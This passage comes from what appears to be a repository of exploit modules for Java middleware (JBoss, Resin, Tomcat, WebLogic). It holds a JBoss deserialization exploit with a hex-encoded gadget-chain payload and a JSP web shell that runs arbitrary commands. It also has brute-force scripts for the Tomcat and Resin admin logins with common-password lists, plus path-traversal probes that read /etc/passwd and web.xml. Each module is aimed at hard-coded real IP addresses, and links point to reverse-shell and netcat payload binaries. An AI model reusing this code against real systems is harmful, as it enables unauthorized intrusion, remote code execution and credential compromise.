32 | result['VerifyInfo']['type']='Jboss Information Disclosure'
33 | result['VerifyInfo']['URL'] =target_url
34 | result['VerifyInfo']['payload']=vul_url
35 | result['VerifyInfo']['result'] =info
36 | return result
37 |
38 |
39 |
40 |
41 |
42 | if __name__ == '__main__':
43 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/jboss/jboss_unrce.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import urllib2
4 | import binascii
5 | import time
6 |
7 |
8 | from t import T
9 |
10 |
11 | def readfile(path):
12 | data=None
13 | file_object = open(path,'rb')
14 | try:
15 | data = file_object.read( )
16 | finally:
17 | file_object.close( )
18 | return data
19 |
20 | class P(T):
21 | def __init__(self):
22 | T.__init__(self)
23 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
24 | timeout=3
25 | target_url = 'http://'+ip+':'+port
26 | result = {}
27 | result['result']=False
28 | res=None
29 | vul_url = target_url+"/invoker/JMXInvokerServlet"
30 | import os
31 | upload_jar = readfile(os.path.split(os.path.realpath(__file__))[0]+'/upload.jar')
32 |
33 |
34 | vul_test=readfile(os.path.split(os.path.realpath(__file__))[0]+'/vultest.dat')
35 |
36 | try:
37 | urllib2.urlopen(vul_url,upload_jar)
38 | res = urllib2.urlopen(vul_url,vul_test)
39 | if 'vultest11111' in res.read():
40 | info= vul_url +" Jboss Unserialization vul"
41 | result['result']=True
42 | result['VerifyInfo'] = {}
43 | result['VerifyInfo']['type']='Jboss Unserialization vul'
44 | result['VerifyInfo']['URL'] =target_url
45 | result['VerifyInfo']['payload']=vul_url
46 | result['VerifyInfo']['result'] =info
47 | return result
48 | except Exception,e:
49 | return result
50 | finally:
51 | if res is not None:
52 | res.close()
53 | del upload_jar
54 | del vul_test
55 |
56 |
57 |
58 |
59 | if __name__ == '__main__':
60 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/jboss/shell.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>
--------------------------------------------------------------------------------
/middileware/jboss/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/jboss/vultest.dat:
--------------------------------------------------------------------------------
1 | \xAC\xED\x00\x05\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x73\x72\x00\x31\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x64\x4D\x61\x70\x61\x77\x3F\xE0\x5D\xF1\x5A\x70\x03\x00\x02\x4C\x00\x0E\x6B\x65\x79\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x4C\x00\x10\x76\x61\x6C\x75\x65\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x71\x00\x7E\x00\x05\x78\x70\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x06\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x78\x70\x76\x72\x00\x17\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x43\x6C\x61\x73\x73\x4C\x6F\x61\x64\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0B\x6E\x65\x77\x49\x6E\x73\x74\x61\x6E\x63\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\x00\x00\x00\x01\x76\x72\x00\x0F\x5B\x4C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x3B\x52\x51\xFD\x24\xC5\x1B\x68\xCD\x02\x00\x00\x78\x70\x74\x00\x09\x67\x65\x74\x4D\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7E\x00\x19\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x01\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x13\x4C\x00\x04\x66\x69\x6C\x65\x71\x00\x7E\x00\x13\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x13\x4C\x00\x08\x70\x72\x6F\x74\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x13\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x13\x78\x70\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x70\x74\x00\x0B\x75\x74\x69\x6C\x32\x33\x33\x2E\x6A\x61\x72\x74\x00\x00\x74\x00\x04\x66\x69\x6C\x65\x70\x78\x74\x00\x06\x69\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7E\x00\x16\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x01\x74\x00\x10\x6A\x63\x2E\x75\x74\x69\x6C\x2E\x43\x6F\x6D\x6D\x55\x74\x69\x6C\x74\x00\x09\x6C\x6F\x61\x64\x43\x6C\x61\x73\x73\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x01\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x02\x74\x00\x04\x6D\x61\x69\x6E\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x01\x76\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x71\x00\x7E\x00\x1D\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x71\x00\x7E\x00\x20\x71\x00\x7E\x00\x21\x73\x71\x00\x7E\x00\x11\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x02\x70\x75\x71\x00\x7E\x00\x16\x00\x00\x00\x01\x75\x71\x00\x7E\x00\x39\x00\x00\x00\x04\x74\x00\x04\x64\x61\x74\x61\x74\x00\x07\x2D\x61\x63\x74\x69\x6F\x6E\x74\x00\x06\x72\x75\x6E\x63\x6D\x64\x74\x00\x12\x65\x63\x68\x6F\x20\x76\x75\x6C\x74\x65\x73\x74\x31\x31\x31\x31\x31\x71\x71\x00\x7E\x00\x2B\x75\x71\x00\x7E\x00\x19\x00\x00\x00\x02\x71\x00\x7E\x00\x2E\x71\x00\x7E\x00\x2F\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x05\x76\x61\x6C\x75\x65\x74\x00\x0D\x64\x6F\x65\x73\x27\x74\x20\x6D\x61\x74\x74\x65\x72\x78\x78\x76\x72\x00\x1B\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x54\x61\x72\x67\x65\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70
--------------------------------------------------------------------------------
/middileware/resin/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['resin', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | return False
--------------------------------------------------------------------------------
/middileware/resin/resin_crackpass.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 |
4 |
5 | from t import T
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | timeout=3
15 | target_url = 'http://'+ip+':'+port
16 | result = {}
17 | result['result']=False
18 | res=None
19 | error_i = 0
20 | flag_list=['<th>Resin home:</th>','The Resin version','Resin Summary']
21 | user_list=['admin']
22 | pass_list=['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
23 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
24 | for user in user_list:
25 | for password in pass_list:
26 | try:
27 | PostStr='j_username=%s&j_password=%s'%(user,password)
28 | res = opener.open(target_url+'/resin-admin/j_security_check?j_uri=index.php',PostStr)
29 | res_html = res.read()
30 | res_code = res.code
31 | except urllib2.HTTPError,e:
32 | return result
33 | except urllib2.URLError,e:
34 | error_i+=1
35 | if error_i >= 3:
36 | return result
37 | continue
38 | except:
39 |
40 | return result
41 | finally:
42 | if res is not None:
43 | res.close()
44 | del res
45 | for flag in flag_list:
46 | if flag in res_html or int(res_code) == 408:
47 | info = '%s/resin-admin Resin Weak password %s:%s'%(target_url,user,password)
48 | result['result']=True
49 | result['VerifyInfo'] = {}
50 | result['VerifyInfo']['type']='Resin Weak password'
51 | result['VerifyInfo']['URL'] =target_url
52 | result['VerifyInfo']['payload']=target_url+'/resin-admin'
53 | result['VerifyInfo']['result'] =info
54 | return result
55 | return result
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 | if __name__ == '__main__':
66 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/resin/resin_fileread.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 |
4 |
5 | from t import T
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | timeout=3
15 | target_url = 'http://'+ip+':'+port
16 | result = {}
17 | res=None
18 | result['result']=False
19 | vul_url = target_url + "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
20 | try:
21 | res=urllib2.urlopen(vul_url,timeout=timeout)
22 | res_html = res.read()
23 | except:
24 | return result
25 | finally:
26 | if res is not None:
27 | res.close()
28 | del res
29 | if "root:" in res_html:
30 | info = vul_url + " Resin File Read Vul"
31 | result['result']=True
32 | result['VerifyInfo'] = {}
33 | result['VerifyInfo']['type']='Resin File Read Vul'
34 | result['VerifyInfo']['URL'] =target_url
35 | result['VerifyInfo']['payload']=vul_url
36 | result['VerifyInfo']['result'] =info
37 | return result
38 | return result
39 |
40 |
41 |
42 |
43 |
44 |
45 | if __name__ == '__main__':
46 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/resin/resin_fileread2.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import urllib2
4 |
5 |
6 |
7 | from t import T
8 |
9 |
10 |
11 |
12 | class P(T):
13 | def __init__(self):
14 | T.__init__(self)
15 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
16 | timeout=3
17 | target_url = 'http://'+ip+':'+port
18 | result = {}
19 | res=None
20 | result['result']=False
21 | vul_url = target_url + "/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"
22 | try:
23 | res=urllib2.urlopen(vul_url,timeout=timeout)
24 | res_html = res.read()
25 | except:
26 | return result
27 | finally:
28 | if res is not None:
29 | res.close()
30 | del res
31 | if "xml version" in res_html:
32 | info = vul_url + " Resin File Read Vul"
33 | result['result']=True
34 | result['VerifyInfo'] = {}
35 | result['VerifyInfo']['type']='Resin File Read Vul'
36 | result['VerifyInfo']['URL'] =target_url
37 | result['VerifyInfo']['payload']=vul_url
38 | result['VerifyInfo']['result'] =info
39 | return result
40 | return result
41 |
42 |
43 |
44 |
45 |
46 |
47 | if __name__ == '__main__':
48 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/resin/resin_fileread3.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 |
4 | import urllib2
5 |
6 |
7 |
8 | from t import T
9 |
10 |
11 |
12 |
13 | class P(T):
14 | def __init__(self):
15 | T.__init__(self)
16 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
17 | timeout=3
18 | target_url = 'http://'+ip+':'+port
19 | result = {}
20 | res=None
21 | result['result']=False
22 | vul_url = target_url + '/%20..\\web-inf'
23 | try:
24 |
25 | res=urllib2.urlopen(vul_url,timeout=timeout)
26 | res_html = res.read()
27 | except:
28 | return result
29 | finally:
30 | if res is not None:
31 | res.close()
32 | del res
33 | if "<h1>Directory of" in res_html:
34 | info = vul_url + " Resin File Read And Directory Browsing Vul CVE:2007-2440"
35 | result['result']=True
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['type']='Resin File Read Vul'
38 | result['VerifyInfo']['URL'] =target_url
39 | result['VerifyInfo']['payload']=vul_url
40 | result['VerifyInfo']['result'] =info
41 | return result
42 | return result
43 |
44 |
45 |
46 |
47 |
48 |
49 | if __name__ == '__main__':
50 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/resin/resin_fileread4.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 |
4 | import urllib2
5 |
6 |
7 |
8 | from t import T
9 |
10 |
11 |
12 |
13 | class P(T):
14 | def __init__(self):
15 | T.__init__(self)
16 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
17 | timeout=3
18 | target_url = 'http://'+ip+':'+port
19 | result = {}
20 | result['result']=False
21 | vul_url = target_url + '/%3f.jsp'
22 | res=None
23 | try:
24 | res=urllib2.urlopen(vul_url,timeout=timeout)
25 | res_html = res.read()
26 | except:
27 | return result
28 | finally:
29 | if res is not None:
30 | res.close()
31 | del res
32 | if "<h1>Directory of" in res_html:
33 | info = vul_url + " Resin File Read And Directory Browsing "
34 | result['result']=True
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['type']='Resin File Read And Directory Browsing '
37 | result['VerifyInfo']['URL'] =target_url
38 | result['VerifyInfo']['payload']=vul_url
39 | result['VerifyInfo']['result'] =info
40 | return result
41 | return result
42 |
43 |
44 |
45 |
46 |
47 |
48 | if __name__ == '__main__':
49 | print P().verify(ip='1.202.164.105',port='8080')
--------------------------------------------------------------------------------
/middileware/resin/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/tomcat/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['tomcat', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'Apache Tomcat' in context :
4 |
5 |
6 | return True
7 |
8 | else:
9 |
10 | return False
--------------------------------------------------------------------------------
/middileware/tomcat/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/tomcat/tomcat_crackpass.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | #author:wolf@future-sec
3 | import urllib2
4 | import base64,re
5 | from t import T
6 |
7 | class P(T):
8 | def __init__(self):
9 | T.__init__(self)
10 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
11 | timeout=10
12 | target_url = 'http://'+ip+':'+port
13 | result = {}
14 | result['result']=False
15 | res=None
16 | res_code=0
17 | res_html=''
18 | error_i=0
19 | flag_list=['Application Manager','Welcome']
20 | # user_list=['admin']
21 | # pass_list=['admin','']
22 | user_list=['admin','manager','tomcat','apache','root']
23 | pass_list=['admin','','123456','12345678','123456789','admin123','123123','admin888','password','admin1','administrator','8888888','123123','manager','tomcat','apache','root']
24 |
25 |
26 |
27 | for user in user_list:
28 | for password in pass_list:
29 | try:
30 |
31 | login_url = target_url+'/manager/html'
32 | request = urllib2.Request(login_url)
33 | auth_str_temp=user+':'+password
34 | auth_str=base64.b64encode(auth_str_temp)
35 | request.add_header('Authorization', 'Basic '+auth_str)
36 | res = urllib2.urlopen(request,timeout=timeout)
37 | res_code = res.code
38 | res_html = res.read()
39 | except urllib2.HTTPError,e:
40 | print 1
41 | res_code = e.code
42 | res_html = e.read()
43 | except urllib2.URLError,e:
44 |
45 |
46 | continue
47 | except:
48 |
49 | break
50 | finally:
51 | error_i+=1
52 |
53 | if res is not None:
54 | res.close()
55 | del res
56 | if error_i >= 3:
57 | return result
58 |
59 | if int(res_code) == 404:
60 | return result
61 | if int(res_code) == 401 or int(res_code) == 403:
62 | continue
63 | info=''
64 | for flag in flag_list:
65 | if flag in res_html:
66 |
67 | info = '%s Tomcat Weak password %s:%s'%(login_url,user,password)
68 |
69 |
70 |
71 | result['result']=True
72 | result['VerifyInfo'] = {}
73 | result['VerifyInfo']['type']='Tomcat Weak password'
74 | result['VerifyInfo']['URL'] =target_url
75 | result['VerifyInfo']['payload']=login_url
76 | result['VerifyInfo']['result'] =info
77 | return result
78 | return result
79 | return result
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 | if __name__ == '__main__':
89 | print P().verify(ip='113.105.74.144',port='80')
--------------------------------------------------------------------------------
/middileware/weblogic/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['weblogic', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'Hypertext Transfer Protocol' in context or 'console/css/login.css|Login_GC_LoginPage_Bg.gif' in context or 'weblogic' in hackinfo or 'weblogic' in keywords or 'weblogic' in productname.get('productname',''):
4 |
5 |
6 | return True
7 |
8 | else:
9 |
10 | return False
--------------------------------------------------------------------------------
/middileware/weblogic/collections_3.2.0.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/collections_3.2.0.jar
--------------------------------------------------------------------------------
/middileware/weblogic/javax.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/javax.jar
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/inst.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/inst.jar
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/nc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/nc.exe
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_delete.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_delete.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_inst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_inst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_reverse.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_reverse.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_uninst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_uninst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_upload_inst.bin:
--------------------------------------------------------------------------------
